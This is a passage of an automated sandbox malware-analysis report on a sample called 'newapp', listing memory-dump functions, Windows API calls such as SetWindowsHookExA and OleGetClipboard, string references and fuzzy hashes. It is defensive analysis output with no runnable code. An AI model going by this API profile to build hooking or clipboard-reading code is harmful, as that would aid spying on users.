$^q, xrefs: 06F1AED1
$^q, xrefs: 06F1AF24
$^q, xrefs: 06F1AF53
$^q, xrefs: 06F1AF7C

Memory Dump Source

Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: 964cc743ead0305d4acf50f9bc1843160401649bd383ac1d3b5d7f5d4783312e
Instruction ID: 756b7ea823d2d7ddbcfe60f524336f76194ae95bbc8baf57b5c87ad9034b1c6c
Opcode Fuzzy Hash: 964cc743ead0305d4acf50f9bc1843160401649bd383ac1d3b5d7f5d4783312e
Instruction Fuzzy Hash: F6E18A31F0020A8FCB65DFA9D8846AEB7A2FF85340F208529D419AF354DB75DD4ACB81

Function 06F0A247 Relevance: 6.1, APIs: 4, Instructions: 145
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06F0A326
GetCurrentThread.KERNEL32 ref: 06F0A363
GetCurrentProcess.KERNEL32 ref: 06F0A3A0
GetCurrentThreadId.KERNEL32 ref: 06F0A3F9

Memory Dump Source

Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: b43b7c3db467595f7c06677e0554c7e6310baf71de29a2728cbce86726f8a22e
Instruction ID: 3731d97dee429cad4d1eab0990234ba558b273d3fc355f439433c5502539e93a
Opcode Fuzzy Hash: b43b7c3db467595f7c06677e0554c7e6310baf71de29a2728cbce86726f8a22e
Instruction Fuzzy Hash: 1F5188B09013498FEB54DFAAD9487DEBFF1FF88304F24805AD049A72A1D735A984CB65

Function 06F0A299 Relevance: 6.1, APIs: 4, Instructions: 138
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06F0A326
GetCurrentThread.KERNEL32 ref: 06F0A363
GetCurrentProcess.KERNEL32 ref: 06F0A3A0
GetCurrentThreadId.KERNEL32 ref: 06F0A3F9

Memory Dump Source

Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: d75568205f0b93e7b321265a05d9748d70dc7530925cbe079e085133d98e168e
Instruction ID: 160486ccef42d69ba70c14821fc087776a2500bdb4d0b29cad8d32d24e4895a6
Opcode Fuzzy Hash: d75568205f0b93e7b321265a05d9748d70dc7530925cbe079e085133d98e168e
Instruction Fuzzy Hash: 575167B09003499FDB54CFAAD948B9EBFF1BF88304F20805AD109A72A1D735A984CF65

Function 06F0A2A8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06F0A326
GetCurrentThread.KERNEL32 ref: 06F0A363
GetCurrentProcess.KERNEL32 ref: 06F0A3A0
GetCurrentThreadId.KERNEL32 ref: 06F0A3F9

Memory Dump Source

Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: dd2ac03f654d5af76f5d771ecddd4992938bcf7fc89333c1cfbcb7712cb6113b
Instruction ID: 4a78c727d44c802aac5808ad234252c3582a823b30ffec41d7b0884d34cf6fff
Opcode Fuzzy Hash: dd2ac03f654d5af76f5d771ecddd4992938bcf7fc89333c1cfbcb7712cb6113b
Instruction Fuzzy Hash: F85154B09003098FDB54CFAAD948B9EBBF1BF88304F20C459D119A72A0DB35A984CF65

Function 06F19238 Relevance: 5.2, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06F1927F
$^q, xrefs: 06F192BA
$^q, xrefs: 06F1928B
$^q, xrefs: 06F192C6

Memory Dump Source

Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 0447e72ce26787fb1f1375b66526d558e3d55fba7a3a515c311b70bf6b9bc59a
Instruction ID: 9f566c1d8a200b6a21cad9b4b608a213ea3be983d8da532282bc34ce97bd1ff4
Opcode Fuzzy Hash: 0447e72ce26787fb1f1375b66526d558e3d55fba7a3a515c311b70bf6b9bc59a
Instruction Fuzzy Hash: 24915D30F0021A9FDB54DF79E8607AEB7F6FBC9640F108469C409EB384EA749D468B91

Function 06F14C78 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fcq, xrefs: 06F14CA3
\Ocq, xrefs: 06F14E53
XPcq, xrefs: 06F14DC9

Memory Dump Source

Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd

Similarity

API ID:
String ID: fcq$XPcq$\Ocq
API String ID: 0-3575482020
Opcode ID: 000fe0546618441bff6bb0e48025b356e1560d00b4b947af0c78aa42c774f87c
Instruction ID: dc1e8890b6c65b8b1f7585001b41b086a65d86764e6598c5b2c052796bdd02bb
Opcode Fuzzy Hash: 000fe0546618441bff6bb0e48025b356e1560d00b4b947af0c78aa42c774f87c
Instruction Fuzzy Hash: 7E617A31F002199FEB54DFA9D8547AEBAF2FBC8740F208429D10AEF394DA758D458B91

Function 06F18160 Relevance: 2.7, Strings: 2, Instructions: 248
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06F181CB
$^q, xrefs: 06F181D7

Memory Dump Source

Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 5f0ff3cd24ca1826a5197561e37c5a2d6465bb0fe9933dcfdfadf20a5666fca3
Instruction ID: 103c33dbcd3c8d93ef4317d3bbb9f53fcc80a86ede0fb5199c319ab4230df43f
Opcode Fuzzy Hash: 5f0ff3cd24ca1826a5197561e37c5a2d6465bb0fe9933dcfdfadf20a5666fca3
Instruction Fuzzy Hash: EF918A31F002068FDB54DB79EA5466EB7A6FF84384F148429D816EB394EF34EC468B91

Function 06F19237 Relevance: 2.7, Strings: 2, Instructions: 154
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06F1927F
$^q, xrefs: 06F192BA

Memory Dump Source

Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 8b52b1bd7096f1e1ed050ea57c1d1fbbb0459dfbf1e81774c179da1eb38022b9
Instruction ID: f8679591d768680ffbd08660c791fa0f6f688d53d162d29a4a0ee74ef9e18528
Opcode Fuzzy Hash: 8b52b1bd7096f1e1ed050ea57c1d1fbbb0459dfbf1e81774c179da1eb38022b9
Instruction Fuzzy Hash: DF513C30B002159FDB54DB79E9A4BAEB7F6EBC8640F108429C409EB394EA74DC42CBD5

Function 06F14C73 Relevance: 2.6, Strings: 2, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fcq, xrefs: 06F14CA3
XPcq, xrefs: 06F14DC9

Memory Dump Source

Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd

Similarity

API ID:
String ID: fcq$XPcq
API String ID: 0-936005338
Opcode ID: c5888ed798e7d45f11d47a77161b270e3a946374a946185f0e1e6c6172940048
Instruction ID: ed1c9162e99d80eccf70e5267619078074510d7f9f1d499263386f000ac0f44d
Opcode Fuzzy Hash: c5888ed798e7d45f11d47a77161b270e3a946374a946185f0e1e6c6172940048
Instruction Fuzzy Hash: A3515B70F002199FDB55DFB9C854BAEBAE7BFC8740F208529D10AAF395DA758C018B91

Function 06F05370 Relevance: 1.8, APIs: 1, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 30aa2e3bf101ed57f75e509a826ee977c8aa6daf3a4acee9feff81c78212eb9b
Instruction ID: 4ee7ab24d24e488dec61d0d08d0e03f8fe22e99df0f871b8600f845924a78087
Opcode Fuzzy Hash: 30aa2e3bf101ed57f75e509a826ee977c8aa6daf3a4acee9feff81c78212eb9b
Instruction Fuzzy Hash: FBB17C70B007068FDB94EF69D89056EBBF2FF88310B108529C41A9B395DB74E946CF90

Function 06F0674E Relevance: 1.6, APIs: 1, Instructions: 120COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06F0686A

Memory Dump Source

Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 817e3506d8eef2b03f5ba2a674d8b7098dcc9125115b0c85b017e59043c4263c
Instruction ID: ef46a233112a24f14f81448a2b709b6f1eaa4a8f9836bb03c69f9ccd061fce32
Opcode Fuzzy Hash: 817e3506d8eef2b03f5ba2a674d8b7098dcc9125115b0c85b017e59043c4263c
Instruction Fuzzy Hash: 0451C0B1D003199FDB14CFA9D884ADEFBB5BF88310F24862AE418AB250D7709955CF91

Function 06F06758 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06F0686A

Memory Dump Source

Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 61d3088ad9b1cd0bc31e721548d07a08661df614043a1660dcbd16faff3d0f58
Instruction ID: 64b5b6e5f69dd096b6e89749a2457f051acc45d7e24d9fe6f3b0c9e469f326fb
Opcode Fuzzy Hash: 61d3088ad9b1cd0bc31e721548d07a08661df614043a1660dcbd16faff3d0f58
Instruction Fuzzy Hash: 5C41C0B1D003099FDB14CF99C884ADEBBF5FF88310F24852AE418AB250D775A845CF91

Function 06F0A274 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 06F0B851

Memory Dump Source

Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: e108d776cfab20231de37b2a469f07a5c34908e786d5162aea3928bdc50baee2
Instruction ID: 27853fed504a706e300478d518f1c8b2d37b871f9441ae7896357e9385383bee
Opcode Fuzzy Hash: e108d776cfab20231de37b2a469f07a5c34908e786d5162aea3928bdc50baee2
Instruction Fuzzy Hash: AB4127B5D0030ACFDB54CF99C888AAABBF5FB88314F24C459D519AB361D735A841CFA0

Function 06F0C0D4 Relevance: 1.6, APIs: 1, Instructions: 77comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 06F0C168

Memory Dump Source

Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 0c14bf095f97c323d809b6ae6f35951ed77ed724e1b07f5476d110dda06c5eff
Instruction ID: 0f6eb6c104f67b1e2900f61aa93fc281110b4adcd03e57ad4ad4037d9539733c
Opcode Fuzzy Hash: 0c14bf095f97c323d809b6ae6f35951ed77ed724e1b07f5476d110dda06c5eff
Instruction Fuzzy Hash: 9E3136B1E01248DFEB10CFA9C984BCDBBF5AF48304F208119E404BB290DB745945CF95

Function 0181EF41 Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?), ref: 0181EFE7

Memory Dump Source

Source File: 0000000A.00000002.2007701504.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1810000_newapp.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 7c7a30b74a431392da687794321974934d4050fc132d72e7e61f4fb572ba3496
Instruction ID: 48d98a7df6eb8a857777cec9fa421583ac6b83a122622f53ec38c3440a80aff1
Opcode Fuzzy Hash: 7c7a30b74a431392da687794321974934d4050fc132d72e7e61f4fb572ba3496
Instruction Fuzzy Hash: D1219A72C0426A9FCB10CFAAD40479EFBF4EF88310F11856AE854A7250D778AA45CFA1

Function 06F0C0E0 Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 06F0C168

Memory Dump Source

Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 3f4de6dd425da9c0cfea066d9861cd7ad58a26c3ee229ba34ecdf0e5ef3fb027
Instruction ID: 17130a0a83382b5b119a3a614078755f0920f8afe581ad17d6701200507b65e5
Opcode Fuzzy Hash: 3f4de6dd425da9c0cfea066d9861cd7ad58a26c3ee229ba34ecdf0e5ef3fb027
Instruction Fuzzy Hash: 943102B1E01208EFEB14DF99C984BCEBBF5AF48304F248119E405BB294DB74A985CF95

Function 06F0A4E8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06F0A577

Memory Dump Source

Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1288c0ca1417480cb90ec886d7a9bb1b6e0148281f2346ec80f11982f0e0d862
Instruction ID: c6a992e1a368df87e7407bacffc134c0972ba462e3558d6cbb3a03974415194e
Opcode Fuzzy Hash: 1288c0ca1417480cb90ec886d7a9bb1b6e0148281f2346ec80f11982f0e0d862
Instruction Fuzzy Hash: 0F21E5B5D00258AFDB10CFAAD984AEEBFF4FB49310F14801AE954A3251D375A944CFA5

Function 06F0A4F0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06F0A577

Memory Dump Source

Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 661f2804f4a8f84a03b3f3d1f961268109b722b3352938cbb026a12bc1c59693
Instruction ID: 292a3282713f4ba5c6b10882ca2c4ee6412b17b52b389e9669a0c7f7feaaad4d
Opcode Fuzzy Hash: 661f2804f4a8f84a03b3f3d1f961268109b722b3352938cbb026a12bc1c59693
Instruction Fuzzy Hash: DB21E3B5D002089FDB10CF9AD984ADEBBF4FB48310F14801AE914A3251C374A940CFA5

Function 06F0DEA3 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06F0DF23

Memory Dump Source

Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: b1d0331117c3fd160fa1cf03e3defe2116d6d2509ccd85568bba540472f3fc3f
Instruction ID: 4e08dc3218b518ede8057e012b748bb53c070ae81cc8ebd20f8194d68e657f8c
Opcode Fuzzy Hash: b1d0331117c3fd160fa1cf03e3defe2116d6d2509ccd85568bba540472f3fc3f
Instruction Fuzzy Hash: DB2115B1D002099FDB14CF99D844BEEFBF5EF88314F10842AE458A7290C774A944CFA5

Function 06F0DEA8 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06F0DF23

Memory Dump Source

Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 68b00b0b077f6cef17678cb66c1909745efb68198fc484241abd9c4ed57d89cd
Instruction ID: 3fc4d047176130ac8b817999cf673d7058f2bfb77bc10cfd39d43fde764463ad
Opcode Fuzzy Hash: 68b00b0b077f6cef17678cb66c1909745efb68198fc484241abd9c4ed57d89cd
Instruction Fuzzy Hash: 4E2124B1D002098FDB14CF9AD844BEEFBF5EF88320F10842AE458A7290C774A944CFA5

Function 06F056A8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 06F05716

Memory Dump Source

Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 8e931e275d2137513a5b62f459e8edd2b939ed7e96f337dfc83a646286f2e7c7
Instruction ID: ee7749e1a929dd223d2ddf6aea19f4cdc060776370079906daa889c012fd8d90
Opcode Fuzzy Hash: 8e931e275d2137513a5b62f459e8edd2b939ed7e96f337dfc83a646286f2e7c7
Instruction Fuzzy Hash: BE1123B5D006499FDB10DFAAD944BDEFBF4EB89320F10812AD419A7250C375A545CFA1

Function 0181EF80 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?), ref: 0181EFE7

Memory Dump Source

Source File: 0000000A.00000002.2007701504.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1810000_newapp.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 792f193b416c138874d92ab4b4d72164cc398d182849bcfa298d091b8c74a7f9
Instruction ID: 6cb865d16e5ec9fbb2b25ea9d3bea682dc0c97a663a0bea9545b7c1fcc660c64
Opcode Fuzzy Hash: 792f193b416c138874d92ab4b4d72164cc398d182849bcfa298d091b8c74a7f9
Instruction Fuzzy Hash: CF1123B2C006699BCB10CF9AC444BDEFBF4EF48320F15816AE818A7240D778A944CFA5

Function 06F03FFC Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 06F05716

Memory Dump Source

Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: fad06419e9ba080cd696402218e5e5736210776868cf12507070d36b9476d668
Instruction ID: 6fe1e873989ed8dc69cfd4f6d67f8ad87adb658d96997efa7c31a23ecf357c2c
Opcode Fuzzy Hash: fad06419e9ba080cd696402218e5e5736210776868cf12507070d36b9476d668
Instruction Fuzzy Hash: BB1120B6C00248CFDB10CF9AC548B9EFBF4EB89320F10802AD818B7240C3B4A545CFA5

Function 06F0BF91 Relevance: 1.5, APIs: 1, Instructions: 49comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06F0BFED

Memory Dump Source

Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: bc6f26a369ca5bac9b49eda21aebe5485fef9cb30955d6016da70869ea9e5697
Instruction ID: da7f571ce6ad75cf1f7376a462db770cd015cf660096c798337ad521dfbe902f
Opcode Fuzzy Hash: bc6f26a369ca5bac9b49eda21aebe5485fef9cb30955d6016da70869ea9e5697
Instruction Fuzzy Hash: 171166B5D002488FDB20DFAAD884BDEFFF8EB49320F20845AD458A7250C335A580CFA1

Function 06F0BAC8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,06F0BAA5), ref: 06F0BB2F

Memory Dump Source

Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 61aaf38329c474acf822a87b1bca68351a0c37cef814985dc3bf3980b8e9054d
Instruction ID: d2a1f2d8cec8b09a2d245aa029fd40f09df6bcd41cb46690d7f08384493455a4
Opcode Fuzzy Hash: 61aaf38329c474acf822a87b1bca68351a0c37cef814985dc3bf3980b8e9054d
Instruction Fuzzy Hash: 111145B5C00248CFDB20DF9AD885BDEFBF8EB48324F208419D418A3240C779A940CFA5

Function 06F0B4EC Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06F0BFED

Memory Dump Source

Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: cb9670a23c7d1c6c4143f26db88009689bffffda0e8bf94e25ad5f742ceb90e9
Instruction ID: ff46480e0db9e5f8069cfe93b0f82356248990137db117bca84eca83cf67c162
Opcode Fuzzy Hash: cb9670a23c7d1c6c4143f26db88009689bffffda0e8bf94e25ad5f742ceb90e9
Instruction Fuzzy Hash: F31142B5C003088FDB20DF9AD488BDEFBF8EB48320F208419E518A7250C379A944CFA5

Function 06F0B2B4 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,06F0BAA5), ref: 06F0BB2F

Memory Dump Source

Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 7b31a6167dbd21e7f3ca2664148687bef1132df15ad6d11d68432a60b19f21f3
Instruction ID: 7cfb23d889f3a398e671d5e28a48a42530245d4a779fcd790da78f8f961d7ddc
Opcode Fuzzy Hash: 7b31a6167dbd21e7f3ca2664148687bef1132df15ad6d11d68432a60b19f21f3
Instruction Fuzzy Hash: 5C1133B1800348CFDB60DF9AC485BDEFBF4EB48324F20841AD519A7240C375A940CFA5

Function 06F1DBB9 Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

PH^q, xrefs: 06F1DD09

Memory Dump Source

Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: f5cb444331eec9cdb0a42e543f6507a4a460cf6b1689852d3e2c94e30406a77c
Instruction ID: 618871b16da5ec9fdc3ec65830227c4f2203f8f7781ea3249f8e402a560332d6
Opcode Fuzzy Hash: f5cb444331eec9cdb0a42e543f6507a4a460cf6b1689852d3e2c94e30406a77c
Instruction Fuzzy Hash: BF417D31E0021A9FDB64DFA5D55469EBBB2FF85380F204929E416EF340EBB1E945CB81

Function 06F121D8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

PH^q, xrefs: 06F12313

Memory Dump Source

Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 009f43aa0748a1049920ef0527e0cbb68b6310ddaf1fac84a7d06e678c7537ef
Instruction ID: 5229b9de3268b6fdde086248b0e3cdc9429b34afb20e8d2c7c0c880e7b28e829
Opcode Fuzzy Hash: 009f43aa0748a1049920ef0527e0cbb68b6310ddaf1fac84a7d06e678c7537ef
Instruction Fuzzy Hash: 0531CF31B002068FDB999BB4E51466E7BE2BBC9640F208428D406DF394EE75DE86CB91

Function 06F1815B Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

$^q, xrefs: 06F181CB

Memory Dump Source

Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: 9dcfdb49068dbb93318383a03c969f398579e0ce30d3f1506d30bbf0a56c397e
Instruction ID: a2817f1867c97edc9b0185b725992c4dc3133bd4bb3efdfa2eada4c01b685950
Opcode Fuzzy Hash: 9dcfdb49068dbb93318383a03c969f398579e0ce30d3f1506d30bbf0a56c397e
Instruction Fuzzy Hash: 7D010432F002149FDF648A65EE446AAB7AAEB803D0F100429E926EF250DA31DE09C791

Function 06F14B61 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

\Ocq, xrefs: 06F14B6D

Memory Dump Source

Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd

Similarity

API ID:
String ID: \Ocq
API String ID: 0-2995510325
Opcode ID: 577e74ffb4b9c8a17b576a518d88fb1ead53678e059ae382d59c0fa5590912f2
Instruction ID: a3712e4352d8c950529fae11335927c9e01a4abf5028b68883615f3f8caf7642
Opcode Fuzzy Hash: 577e74ffb4b9c8a17b576a518d88fb1ead53678e059ae382d59c0fa5590912f2
Instruction Fuzzy Hash: 5BF0D430E1012ADFDB14DF94E899BAEBBF2BF88741F204119E402AB294CBB45D05CB81

Function 06F159E8 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae3b02b3fdbcac6b30bfc2405c04519ce638e1cf60915a5bc15a325c98093a6b
Instruction ID: f084bae58f53ae425f3eda25057e8df2b5c471290f7a52ad15a4374644f68d81
